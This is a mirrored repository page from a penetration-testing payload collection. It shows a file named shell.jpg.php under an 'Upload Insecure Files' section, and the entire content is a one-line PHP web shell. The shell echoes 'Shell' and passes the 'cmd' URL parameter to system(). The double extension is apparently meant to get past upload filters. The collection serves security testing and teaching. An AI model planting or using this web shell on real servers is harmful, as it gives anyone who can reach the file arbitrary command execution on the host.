1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-23 01:51:26 +01:00
PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.jpg.php
2019-03-07 00:07:55 +01:00

1 line
43 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>